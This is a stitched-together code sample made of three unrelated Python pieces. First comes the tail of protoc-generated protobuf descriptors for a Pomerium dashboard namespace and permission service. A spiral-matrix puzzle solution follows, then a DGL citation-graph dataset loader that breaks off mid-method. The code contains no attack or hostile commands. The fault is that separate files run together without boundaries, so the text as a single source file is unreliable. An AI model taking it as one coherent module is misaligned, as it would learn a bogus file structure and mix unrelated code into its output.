full_name='pomerium.dashboard.GetNamespacePermissionResponse',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='namespace_permission', full_name='pomerium.dashboard.GetNamespacePermissionResponse.namespace_permission', index=0,
number=1, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=1419,
serialized_end=1522,
)
_LISTNAMESPACEPERMISSIONSREQUEST = _descriptor.Descriptor(
name='ListNamespacePermissionsRequest',
full_name='pomerium.dashboard.ListNamespacePermissionsRequest',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=1524,
serialized_end=1557,
)
_LISTNAMESPACEPERMISSIONSRESPONSE = _descriptor.Descriptor(
name='ListNamespacePermissionsResponse',
full_name='pomerium.dashboard.ListNamespacePermissionsResponse',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='namespace_permissions', full_name='pomerium.dashboard.ListNamespacePermissionsResponse.namespace_permissions', index=0,
number=1, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=1559,
serialized_end=1665,
)
_LISTNAMESPACEPERMISSIONGROUPSREQUEST = _descriptor.Descriptor(
name='ListNamespacePermissionGroupsRequest',
full_name='pomerium.dashboard.ListNamespacePermissionGroupsRequest',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='namespace_id', full_name='pomerium.dashboard.ListNamespacePermissionGroupsRequest.namespace_id', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=1667,
serialized_end=1727,
)
_LISTNAMESPACEPERMISSIONGROUPSRESPONSE = _descriptor.Descriptor(
name='ListNamespacePermissionGroupsResponse',
full_name='pomerium.dashboard.ListNamespacePermissionGroupsResponse',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='groups', full_name='pomerium.dashboard.ListNamespacePermissionGroupsResponse.groups', index=0,
number=1, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=1729,
serialized_end=1830,
)
_LISTNAMESPACEPERMISSIONUSERSREQUEST = _descriptor.Descriptor(
name='ListNamespacePermissionUsersRequest',
full_name='pomerium.dashboard.ListNamespacePermissionUsersRequest',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='namespace_id', full_name='pomerium.dashboard.ListNamespacePermissionUsersRequest.namespace_id', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=1832,
serialized_end=1891,
)
_LISTNAMESPACEPERMISSIONUSERSRESPONSE = _descriptor.Descriptor(
name='ListNamespacePermissionUsersResponse',
full_name='pomerium.dashboard.ListNamespacePermissionUsersResponse',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='users', full_name='pomerium.dashboard.ListNamespacePermissionUsersResponse.users', index=0,
number=1, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=1893,
serialized_end=1991,
)
_SETNAMESPACEPERMISSIONREQUEST = _descriptor.Descriptor(
name='SetNamespacePermissionRequest',
full_name='pomerium.dashboard.SetNamespacePermissionRequest',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='namespace_permission', full_name='pomerium.dashboard.SetNamespacePermissionRequest.namespace_permission', index=0,
number=1, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=1993,
serialized_end=2095,
)
_SETNAMESPACEPERMISSIONRESPONSE = _descriptor.Descriptor(
name='SetNamespacePermissionResponse',
full_name='pomerium.dashboard.SetNamespacePermissionResponse',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='namespace_permission', full_name='pomerium.dashboard.SetNamespacePermissionResponse.namespace_permission', index=0,
number=1, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=2097,
serialized_end=2200,
)
_NAMESPACE.fields_by_name['created_at'].message_type = google_dot_protobuf_dot_timestamp__pb2._TIMESTAMP
_NAMESPACE.fields_by_name['modified_at'].message_type = google_dot_protobuf_dot_timestamp__pb2._TIMESTAMP
_NAMESPACE.fields_by_name['deleted_at'].message_type = google_dot_protobuf_dot_timestamp__pb2._TIMESTAMP
_GETNAMESPACERESPONSE.fields_by_name['namespace'].message_type = _NAMESPACE
_LISTNAMESPACESRESPONSE.fields_by_name['namespaces'].message_type = _NAMESPACE
_SETNAMESPACEREQUEST.fields_by_name['namespace'].message_type = _NAMESPACE
_SETNAMESPACERESPONSE.fields_by_name['namespace'].message_type = _NAMESPACE
_NAMESPACEPERMISSION.fields_by_name['created_at'].message_type = google_dot_protobuf_dot_timestamp__pb2._TIMESTAMP
_NAMESPACEPERMISSION.fields_by_name['modified_at'].message_type = google_dot_protobuf_dot_timestamp__pb2._TIMESTAMP
_GETNAMESPACEPERMISSIONRESPONSE.fields_by_name['namespace_permission'].message_type = _NAMESPACEPERMISSION
_LISTNAMESPACEPERMISSIONSRESPONSE.fields_by_name['namespace_permissions'].message_type = _NAMESPACEPERMISSION
_LISTNAMESPACEPERMISSIONGROUPSRESPONSE.fields_by_name['groups'].message_type = _NAMESPACEPERMISSIONGROUP
_LISTNAMESPACEPERMISSIONUSERSRESPONSE.fields_by_name['users'].message_type = _NAMESPACEPERMISSIONUSER
_SETNAMESPACEPERMISSIONREQUEST.fields_by_name['namespace_permission'].message_type = _NAMESPACEPERMISSION
_SETNAMESPACEPERMISSIONRESPONSE.fields_by_name['namespace_permission'].message_type = _NAMESPACEPERMISSION
DESCRIPTOR.message_types_by_name['Namespace'] = _NAMESPACE
DESCRIPTOR.message_types_by_name['DeleteNamespaceRequest'] = _DELETENAMESPACEREQUEST
DESCRIPTOR.message_types_by_name['DeleteNamespaceResponse'] = _DELETENAMESPACERESPONSE
DESCRIPTOR.message_types_by_name['GetNamespaceRequest'] = _GETNAMESPACEREQUEST
DESCRIPTOR.message_types_by_name['GetNamespaceResponse'] = _GETNAMESPACERESPONSE
DESCRIPTOR.message_types_by_name['ListNamespacesRequest'] = _LISTNAMESPACESREQUEST
DESCRIPTOR.message_types_by_name['ListNamespacesResponse'] = _LISTNAMESPACESRESPONSE
DESCRIPTOR.message_types_by_name['SetNamespaceRequest'] = _SETNAMESPACEREQUEST
DESCRIPTOR.message_types_by_name['SetNamespaceResponse'] = _SETNAMESPACERESPONSE
DESCRIPTOR.message_types_by_name['NamespacePermission'] = _NAMESPACEPERMISSION
DESCRIPTOR.message_types_by_name['NamespacePermissionGroup'] = _NAMESPACEPERMISSIONGROUP
DESCRIPTOR.message_types_by_name['NamespacePermissionUser'] = _NAMESPACEPERMISSIONUSER
DESCRIPTOR.message_types_by_name['DeleteNamespacePermissionRequest'] = _DELETENAMESPACEPERMISSIONREQUEST
DESCRIPTOR.message_types_by_name['DeleteNamespacePermissionResponse'] = _DELETENAMESPACEPERMISSIONRESPONSE
DESCRIPTOR.message_types_by_name['GetNamespacePermissionRequest'] = _GETNAMESPACEPERMISSIONREQUEST
DESCRIPTOR.message_types_by_name['GetNamespacePermissionResponse'] = _GETNAMESPACEPERMISSIONRESPONSE
DESCRIPTOR.message_types_by_name['ListNamespacePermissionsRequest'] = _LISTNAMESPACEPERMISSIONSREQUEST
DESCRIPTOR.message_types_by_name['ListNamespacePermissionsResponse'] = _LISTNAMESPACEPERMISSIONSRESPONSE
DESCRIPTOR.message_types_by_name['ListNamespacePermissionGroupsRequest'] = _LISTNAMESPACEPERMISSIONGROUPSREQUEST
DESCRIPTOR.message_types_by_name['ListNamespacePermissionGroupsResponse'] = _LISTNAMESPACEPERMISSIONGROUPSRESPONSE
DESCRIPTOR.message_types_by_name['ListNamespacePermissionUsersRequest'] = _LISTNAMESPACEPERMISSIONUSERSREQUEST
DESCRIPTOR.message_types_by_name['ListNamespacePermissionUsersResponse'] = _LISTNAMESPACEPERMISSIONUSERSRESPONSE
DESCRIPTOR.message_types_by_name['SetNamespacePermissionRequest'] = _SETNAMESPACEPERMISSIONREQUEST
DESCRIPTOR.message_types_by_name['SetNamespacePermissionResponse'] = _SETNAMESPACEPERMISSIONRESPONSE
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
Namespace = _reflection.GeneratedProtocolMessageType('Namespace', (_message.Message,), {
'DESCRIPTOR' : _NAMESPACE,
'__module__' : 'namespaces_pb2'
# @@protoc_insertion_point(class_scope:pomerium.dashboard.Namespace)
})
_sym_db.RegisterMessage(Namespace)
DeleteNamespaceRequest = _reflection.GeneratedProtocolMessageType('DeleteNamespaceRequest', (_message.Message,), {
'DESCRIPTOR' : _DELETENAMESPACEREQUEST,
'__module__' : 'namespaces_pb2'
# @@protoc_insertion_point(class_scope:pomerium.dashboard.DeleteNamespaceRequest)
})
_sym_db.RegisterMessage(DeleteNamespaceRequest)
DeleteNamespaceResponse = _reflection.GeneratedProtocolMessageType('DeleteNamespaceResponse', (_message.Message,), {
'DESCRIPTOR' : _DELETENAMESPACERESPONSE,
'__module__' : 'namespaces_pb2'
# @@protoc_insertion_point(class_scope:pomerium.dashboard.DeleteNamespaceResponse)
})
_sym_db.RegisterMessage(DeleteNamespaceResponse)
GetNamespaceRequest = _reflection.GeneratedProtocolMessageType('GetNamespaceRequest', (_message.Message,), {
'DESCRIPTOR' : _GETNAMESPACEREQUEST,
'__module__' : 'namespaces_pb2'
# @@protoc_insertion_point(class_scope:pomerium.dashboard.GetNamespaceRequest)
})
_sym_db.RegisterMessage(GetNamespaceRequest)
GetNamespaceResponse = _reflection.GeneratedProtocolMessageType('GetNamespaceResponse', (_message.Message,), {
'DESCRIPTOR' : _GETNAMESPACERESPONSE,
'__module__' : 'namespaces_pb2'
# @@protoc_insertion_point(class_scope:pomerium.dashboard.GetNamespaceResponse)
})
_sym_db.RegisterMessage(GetNamespaceResponse)
ListNamespacesRequest = _reflection.GeneratedProtocolMessageType('ListNamespacesRequest', (_message.Message,), {
'DESCRIPTOR' : _LISTNAMESPACESREQUEST,
'__module__' : 'namespaces_pb2'
# @@protoc_insertion_point(class_scope:pomerium.dashboard.ListNamespacesRequest)
})
_sym_db.RegisterMessage(ListNamespacesRequest)
ListNamespacesResponse = _reflection.GeneratedProtocolMessageType('ListNamespacesResponse', (_message.Message,), {
'DESCRIPTOR' : _LISTNAMESPACESRESPONSE,
'__module__' : 'namespaces_pb2'
# @@protoc_insertion_point(class_scope:pomerium.dashboard.ListNamespacesResponse)
})
_sym_db.RegisterMessage(ListNamespacesResponse)
SetNamespaceRequest = _reflection.GeneratedProtocolMessageType('SetNamespaceRequest', (_message.Message,), {
'DESCRIPTOR' : _SETNAMESPACEREQUEST,
'__module__' : 'namespaces_pb2'
# @@protoc_insertion_point(class_scope:pomerium.dashboard.SetNamespaceRequest)
})
_sym_db.RegisterMessage(SetNamespaceRequest)
SetNamespaceResponse = _reflection.GeneratedProtocolMessageType('SetNamespaceResponse', (_message.Message,), {
'DESCRIPTOR' : _SETNAMESPACERESPONSE,
'__module__' : 'namespaces_pb2'
# @@protoc_insertion_point(class_scope:pomerium.dashboard.SetNamespaceResponse)
})
_sym_db.RegisterMessage(SetNamespaceResponse)
NamespacePermission = _reflection.GeneratedProtocolMessageType('NamespacePermission', (_message.Message,), {
'DESCRIPTOR' : _NAMESPACEPERMISSION,
'__module__' : 'namespaces_pb2'
# @@protoc_insertion_point(class_scope:pomerium.dashboard.NamespacePermission)
})
_sym_db.RegisterMessage(NamespacePermission)
NamespacePermissionGroup = _reflection.GeneratedProtocolMessageType('NamespacePermissionGroup', (_message.Message,), {
'DESCRIPTOR' : _NAMESPACEPERMISSIONGROUP,
'__module__' : 'namespaces_pb2'
# @@protoc_insertion_point(class_scope:pomerium.dashboard.NamespacePermissionGroup)
})
_sym_db.RegisterMessage(NamespacePermissionGroup)
NamespacePermissionUser = _reflection.GeneratedProtocolMessageType('NamespacePermissionUser', (_message.Message,), {
'DESCRIPTOR' : _NAMESPACEPERMISSIONUSER,
'__module__' : 'namespaces_pb2'
# @@protoc_insertion_point(class_scope:pomerium.dashboard.NamespacePermissionUser)
})
_sym_db.RegisterMessage(NamespacePermissionUser)
DeleteNamespacePermissionRequest = _reflection.GeneratedProtocolMessageType('DeleteNamespacePermissionRequest', (_message.Message,), {
'DESCRIPTOR' : _DELETENAMESPACEPERMISSIONREQUEST,
'__module__' : 'namespaces_pb2'
# @@protoc_insertion_point(class_scope:pomerium.dashboard.DeleteNamespacePermissionRequest)
})
_sym_db.RegisterMessage(DeleteNamespacePermissionRequest)
DeleteNamespacePermissionResponse = _reflection.GeneratedProtocolMessageType('DeleteNamespacePermissionResponse', (_message.Message,), {
'DESCRIPTOR' : _DELETENAMESPACEPERMISSIONRESPONSE,
'__module__' : 'namespaces_pb2'
# @@protoc_insertion_point(class_scope:pomerium.dashboard.DeleteNamespacePermissionResponse)
})
_sym_db.RegisterMessage(DeleteNamespacePermissionResponse)
GetNamespacePermissionRequest = _reflection.GeneratedProtocolMessageType('GetNamespacePermissionRequest', (_message.Message,), {
'DESCRIPTOR' : _GETNAMESPACEPERMISSIONREQUEST,
'__module__' : 'namespaces_pb2'
# @@protoc_insertion_point(class_scope:pomerium.dashboard.GetNamespacePermissionRequest)
})
_sym_db.RegisterMessage(GetNamespacePermissionRequest)
GetNamespacePermissionResponse = _reflection.GeneratedProtocolMessageType('GetNamespacePermissionResponse', (_message.Message,), {
'DESCRIPTOR' : _GETNAMESPACEPERMISSIONRESPONSE,
'__module__' : 'namespaces_pb2'
# @@protoc_insertion_point(class_scope:pomerium.dashboard.GetNamespacePermissionResponse)
})
_sym_db.RegisterMessage(GetNamespacePermissionResponse)
ListNamespacePermissionsRequest = _reflection.GeneratedProtocolMessageType('ListNamespacePermissionsRequest', (_message.Message,), {
'DESCRIPTOR' : _LISTNAMESPACEPERMISSIONSREQUEST,
'__module__' : 'namespaces_pb2'
# @@protoc_insertion_point(class_scope:pomerium.dashboard.ListNamespacePermissionsRequest)
})
_sym_db.RegisterMessage(ListNamespacePermissionsRequest)
ListNamespacePermissionsResponse = _reflection.GeneratedProtocolMessageType('ListNamespacePermissionsResponse', (_message.Message,), {
'DESCRIPTOR' : _LISTNAMESPACEPERMISSIONSRESPONSE,
'__module__' : 'namespaces_pb2'
# @@protoc_insertion_point(class_scope:pomerium.dashboard.ListNamespacePermissionsResponse)
})
_sym_db.RegisterMessage(ListNamespacePermissionsResponse)
ListNamespacePermissionGroupsRequest = _reflection.GeneratedProtocolMessageType('ListNamespacePermissionGroupsRequest', (_message.Message,), {
'DESCRIPTOR' : _LISTNAMESPACEPERMISSIONGROUPSREQUEST,
'__module__' : 'namespaces_pb2'
# @@protoc_insertion_point(class_scope:pomerium.dashboard.ListNamespacePermissionGroupsRequest)
})
_sym_db.RegisterMessage(ListNamespacePermissionGroupsRequest)
ListNamespacePermissionGroupsResponse = _reflection.GeneratedProtocolMessageType('ListNamespacePermissionGroupsResponse', (_message.Message,), {
'DESCRIPTOR' : _LISTNAMESPACEPERMISSIONGROUPSRESPONSE,
'__module__' : 'namespaces_pb2'
# @@protoc_insertion_point(class_scope:pomerium.dashboard.ListNamespacePermissionGroupsResponse)
})
_sym_db.RegisterMessage(ListNamespacePermissionGroupsResponse)
ListNamespacePermissionUsersRequest = _reflection.GeneratedProtocolMessageType('ListNamespacePermissionUsersRequest', (_message.Message,), {
'DESCRIPTOR' : _LISTNAMESPACEPERMISSIONUSERSREQUEST,
'__module__' : 'namespaces_pb2'
# @@protoc_insertion_point(class_scope:pomerium.dashboard.ListNamespacePermissionUsersRequest)
})
_sym_db.RegisterMessage(ListNamespacePermissionUsersRequest)
ListNamespacePermissionUsersResponse = _reflection.GeneratedProtocolMessageType('ListNamespacePermissionUsersResponse', (_message.Message,), {
'DESCRIPTOR' : _LISTNAMESPACEPERMISSIONUSERSRESPONSE,
'__module__' : 'namespaces_pb2'
# @@protoc_insertion_point(class_scope:pomerium.dashboard.ListNamespacePermissionUsersResponse)
})
_sym_db.RegisterMessage(ListNamespacePermissionUsersResponse)
SetNamespacePermissionRequest = _reflection.GeneratedProtocolMessageType('SetNamespacePermissionRequest', (_message.Message,), {
'DESCRIPTOR' : _SETNAMESPACEPERMISSIONREQUEST,
'__module__' : 'namespaces_pb2'
# @@protoc_insertion_point(class_scope:pomerium.dashboard.SetNamespacePermissionRequest)
})
_sym_db.RegisterMessage(SetNamespacePermissionRequest)
SetNamespacePermissionResponse = _reflection.GeneratedProtocolMessageType('SetNamespacePermissionResponse', (_message.Message,), {
'DESCRIPTOR' : _SETNAMESPACEPERMISSIONRESPONSE,
'__module__' : 'namespaces_pb2'
# @@protoc_insertion_point(class_scope:pomerium.dashboard.SetNamespacePermissionResponse)
})
_sym_db.RegisterMessage(SetNamespacePermissionResponse)
DESCRIPTOR._options = None
_NAMESPACESERVICE = _descriptor.ServiceDescriptor(
name='NamespaceService',
full_name='pomerium.dashboard.NamespaceService',
file=DESCRIPTOR,
index=0,
serialized_options=None,
create_key=_descriptor._internal_create_key,
serialized_start=2203,
serialized_end=2632,
methods=[
_descriptor.MethodDescriptor(
name='DeleteNamespace',
full_name='pomerium.dashboard.NamespaceService.DeleteNamespace',
index=0,
containing_service=None,
input_type=_DELETENAMESPACEREQUEST,
output_type=_DELETENAMESPACERESPONSE,
serialized_options=None,
create_key=_descriptor._internal_create_key,
),
_descriptor.MethodDescriptor(
name='GetNamespace',
full_name='pomerium.dashboard.NamespaceService.GetNamespace',
index=1,
containing_service=None,
input_type=_GETNAMESPACEREQUEST,
output_type=_GETNAMESPACERESPONSE,
serialized_options=None,
create_key=_descriptor._internal_create_key,
),
_descriptor.MethodDescriptor(
name='ListNamespaces',
full_name='pomerium.dashboard.NamespaceService.ListNamespaces',
index=2,
containing_service=None,
input_type=_LISTNAMESPACESREQUEST,
output_type=_LISTNAMESPACESRESPONSE,
serialized_options=None,
create_key=_descriptor._internal_create_key,
),
_descriptor.MethodDescriptor(
name='SetNamespace',
full_name='pomerium.dashboard.NamespaceService.SetNamespace',
index=3,
containing_service=None,
input_type=_SETNAMESPACEREQUEST,
output_type=_SETNAMESPACERESPONSE,
serialized_options=None,
create_key=_descriptor._internal_create_key,
),
])
_sym_db.RegisterServiceDescriptor(_NAMESPACESERVICE)
DESCRIPTOR.services_by_name['NamespaceService'] = _NAMESPACESERVICE
_NAMESPACEPERMISSIONSERVICE = _descriptor.ServiceDescriptor(
name='NamespacePermissionService',
full_name='pomerium.dashboard.NamespacePermissionService',
file=DESCRIPTOR,
index=1,
serialized_options=None,
create_key=_descriptor._internal_create_key,
serialized_start=2635,
serialized_end=3495,
methods=[
_descriptor.MethodDescriptor(
name='DeleteNamespacePermission',
full_name='pomerium.dashboard.NamespacePermissionService.DeleteNamespacePermission',
index=0,
containing_service=None,
input_type=_DELETENAMESPACEPERMISSIONREQUEST,
output_type=_DELETENAMESPACEPERMISSIONRESPONSE,
serialized_options=None,
create_key=_descriptor._internal_create_key,
),
_descriptor.MethodDescriptor(
name='GetNamespacePermission',
full_name='pomerium.dashboard.NamespacePermissionService.GetNamespacePermission',
index=1,
containing_service=None,
input_type=_GETNAMESPACEPERMISSIONREQUEST,
output_type=_GETNAMESPACEPERMISSIONRESPONSE,
serialized_options=None,
create_key=_descriptor._internal_create_key,
),
_descriptor.MethodDescriptor(
name='ListNamespacePermissions',
full_name='pomerium.dashboard.NamespacePermissionService.ListNamespacePermissions',
index=2,
containing_service=None,
input_type=_LISTNAMESPACEPERMISSIONSREQUEST,
output_type=_LISTNAMESPACEPERMISSIONSRESPONSE,
serialized_options=None,
create_key=_descriptor._internal_create_key,
),
_descriptor.MethodDescriptor(
name='ListNamespacePermissionGroups',
full_name='pomerium.dashboard.NamespacePermissionService.ListNamespacePermissionGroups',
index=3,
containing_service=None,
input_type=_LISTNAMESPACEPERMISSIONGROUPSREQUEST,
output_type=_LISTNAMESPACEPERMISSIONGROUPSRESPONSE,
serialized_options=None,
create_key=_descriptor._internal_create_key,
),
_descriptor.MethodDescriptor(
name='ListNamespacePermissionUsers',
full_name='pomerium.dashboard.NamespacePermissionService.ListNamespacePermissionUsers',
index=4,
containing_service=None,
input_type=_LISTNAMESPACEPERMISSIONUSERSREQUEST,
output_type=_LISTNAMESPACEPERMISSIONUSERSRESPONSE,
serialized_options=None,
create_key=_descriptor._internal_create_key,
),
_descriptor.MethodDescriptor(
name='SetNamespacePermission',
full_name='pomerium.dashboard.NamespacePermissionService.SetNamespacePermission',
index=5,
containing_service=None,
input_type=_SETNAMESPACEPERMISSIONREQUEST,
output_type=_SETNAMESPACEPERMISSIONRESPONSE,
serialized_options=None,
create_key=_descriptor._internal_create_key,
),
])
_sym_db.RegisterServiceDescriptor(_NAMESPACEPERMISSIONSERVICE)
DESCRIPTOR.services_by_name['NamespacePermissionService'] = _NAMESPACEPERMISSIONSERVICE
# @@protoc_insertion_point(module_scope)
|
# Given a positive integer n, generate a square matrix filled with elements from 1 to n^2 in spiral order.
# Example:
# Input: 3
# Output:
# [
# [ 1, 2, 3 ],
# [ 8, 9, 4 ],
# [ 7, 6, 5 ]
# ]
class Solution(object):
    def generateMatrix(self, n):
        """Return an n x n matrix filled with 1..n*n in clockwise spiral order.

        :type n: int
        :rtype: List[List[int]]
        """
        # Simulation, O(n^2): visit cells one by one, turning clockwise
        # whenever the next step would leave the grid or hit a filled cell.
        grid = [[0 for _ in range(n)] for _ in range(n)]
        # (row, col) deltas; the first out-of-bounds probe from (0, 0)
        # immediately rotates the heading to "right", starting the spiral.
        steps = ((-1, 0), (0, 1), (1, 0), (0, -1))
        heading = 0
        row = col = 0
        for value in range(1, n * n + 1):
            grid[row][col] = value
            r, c = row + steps[heading][0], col + steps[heading][1]
            blocked = not (0 <= r < n and 0 <= c < n) or grid[r][c]
            if blocked:
                heading = (heading + 1) % 4
                r, c = row + steps[heading][0], col + steps[heading][1]
            row, col = r, c
        return grid
import torch
import pickle
import torch.utils.data
import time
import os
import numpy as np
import csv
import dgl
from dgl.data import CoraDataset
from dgl.data import CitationGraphDataset
import networkx as nx
import random
from data.ncdata import *
random.seed(42)
def self_loop(g):
    """Return a copy of *g* carrying exactly one self loop per node.

    Utility function only, to be used when the user self_loop flag is set.
    Re-implements dgl.transform.add_self_loop() so that ndata['feat'] and
    edata['feat'] are not lost; called from the CitationGraphsDataset class.
    """
    out = dgl.DGLGraph()
    n_nodes = g.number_of_nodes()
    out.add_nodes(n_nodes)
    out.ndata['feat'] = g.ndata['feat']
    src, dst = g.all_edges(order="eid")
    src = dgl.backend.zerocopy_to_numpy(src)
    dst = dgl.backend.zerocopy_to_numpy(dst)
    # Keep only the non-self edges, then append one self loop for every node.
    keep = src != dst
    out.add_edges(src[keep], dst[keep])
    all_nodes = np.arange(n_nodes)
    out.add_edges(all_nodes, all_nodes)
    # This new edata is not used (only GCN/GAT reach this path), but the
    # generic pipeline expects both ndata['feat'] and edata['feat'] to exist.
    out.edata['feat'] = torch.zeros(out.number_of_edges())
    return out
class CitationGraphsDataset(torch.utils.data.Dataset):
    """Wraps a DGL citation graph (Cora / Citeseer / Pubmed) as a dataset."""
    def __init__(self, name):
        # Load the requested citation graph and pre-compute the node/edge
        # normalisation constants used downstream.
        t0 = time.time()
        self.name = name.lower()
        if self.name == 'cora':
            dataset = CoraDataset()
        else:
            # Any other name understood by CitationGraphDataset
            # (e.g. citeseer, pubmed).
            dataset = CitationGraphDataset(self.name)
        # Strip pre-existing self loops; they are re-added explicitly via
        # _add_self_loops() only when the caller asks for them.
        dataset.graph.remove_edges_from(nx.selfloop_edges(dataset.graph))
        graph = dgl.DGLGraph(dataset.graph)
        E = graph.number_of_edges()
        N = graph.number_of_nodes()
        D = dataset.features.shape[1]  # node feature dimensionality
        graph.ndata['feat'] = torch.Tensor(dataset.features)
        # Edge features are unused here, but the generic pipeline expects
        # edata['feat'] to exist; zeros of shape (E, D).
        graph.edata['feat'] = torch.zeros((E, D))
        graph.batch_num_nodes = [N]
        # Uniform sqrt(1/N) and sqrt(1/E) normalisers (one value per node/edge).
        self.norm_n = torch.FloatTensor(N,1).fill_(1./float(N)).sqrt()
        self.norm_e = torch.FloatTensor(E,1).fill_(1./float(E)).sqrt()
        self.graph = graph
        # Standard semi-supervised split masks provided by the DGL dataset.
        self.train_mask = torch.BoolTensor(dataset.train_mask)
        self.val_mask = torch.BoolTensor(dataset.val_mask)
        self.test_mask = torch.BoolTensor(dataset.test_mask)
        self.labels = torch.LongTensor(dataset.labels)
        self.num_classes = dataset.num_labels
        self.num_dims = D
        print("[!] Dataset: ", self.name)
        print("Time taken: {:.4f}s".format(time.time()-t0))
    def _add_self_loops(self):
        # function for adding self loops
        # this function will be called only if self_loop flag is True
        self.graph = self_loop(self.graph)
        # Symmetric-normalisation factor deg^{-1/2}; clamp avoids div-by-zero
        # for isolated nodes.
        norm = torch.pow(self.graph.in_degrees().float().clamp(min=1), -0.5)
        # Reshape so the factor broadcasts against the node feature tensor.
        shp = norm.shape + (1,) * (self.graph.ndata['feat'].dim() - 1)
        self.norm_n = torch.reshape(norm, shp)
class HetDataset(torch.utils.data.Dataset):
    """Wraps a node-classification graph loaded via load_nc_dataset as a dataset."""
    def __init__(self, name):
        t0 = time.time()
        self.name = name.lower()
        #dataset.graph.remove_edges_from(nx.selfloop_edges(dataset.graph))
        dataset = load_nc_dataset(name)
        # Build the DGLGraph from the raw edge index, then strip self loops
        # (they are re-added explicitly via _add_self_loops() when requested).
        graph = dgl.DGLGraph()
        graph.add_nodes(dataset.graph['node_feat'].shape[0])
        graph.add_edges(dataset.graph['edge_index'][0],dataset.graph['edge_index'][1])
        graph = dgl.transform.remove_self_loop(graph)
        E = graph.number_of_edges()
        N = graph.number_of_nodes()
        D = dataset.graph['node_feat'].shape[1]  # node feature dimensionality
        graph.ndata['feat'] = dataset.graph['node_feat']
        #graph.edata['feat'] = torch.zeros((E, D))
        graph.batch_num_nodes = [N]
        # Uniform sqrt(1/N) node normaliser (one value per node).
        self.norm_n = torch.FloatTensor(N, 1).fill_(1. / float(N)).sqrt()
        #self.norm_e = torch.FloatTensor(E, 1).fill_(1. / float(E)).sqrt()
        self.graph = graph
        self.labels = torch.LongTensor(dataset.label).squeeze()
        self.num_classes = len(np.unique(dataset.label))
        self.num_dims = D
        print("[!] Dataset: ", self.name)
        print("Time taken: {:.4f}s".format(time.time() - t0))
    def _add_self_loops(self):
        # function for adding self loops
        # this function will be called only if self_loop flag is True
        self.graph = self_loop(self.graph)
        # Symmetric-normalisation factor deg^{-1/2}; clamp avoids div-by-zero
        # for isolated nodes.
        norm = torch.pow(self.graph.in_degrees().float().clamp(min=1), -0.5)
        # Reshape so the factor broadcasts against the node feature tensor.
        shp = norm.shape + (1,) * (self.graph.ndata['feat'].dim() - 1)
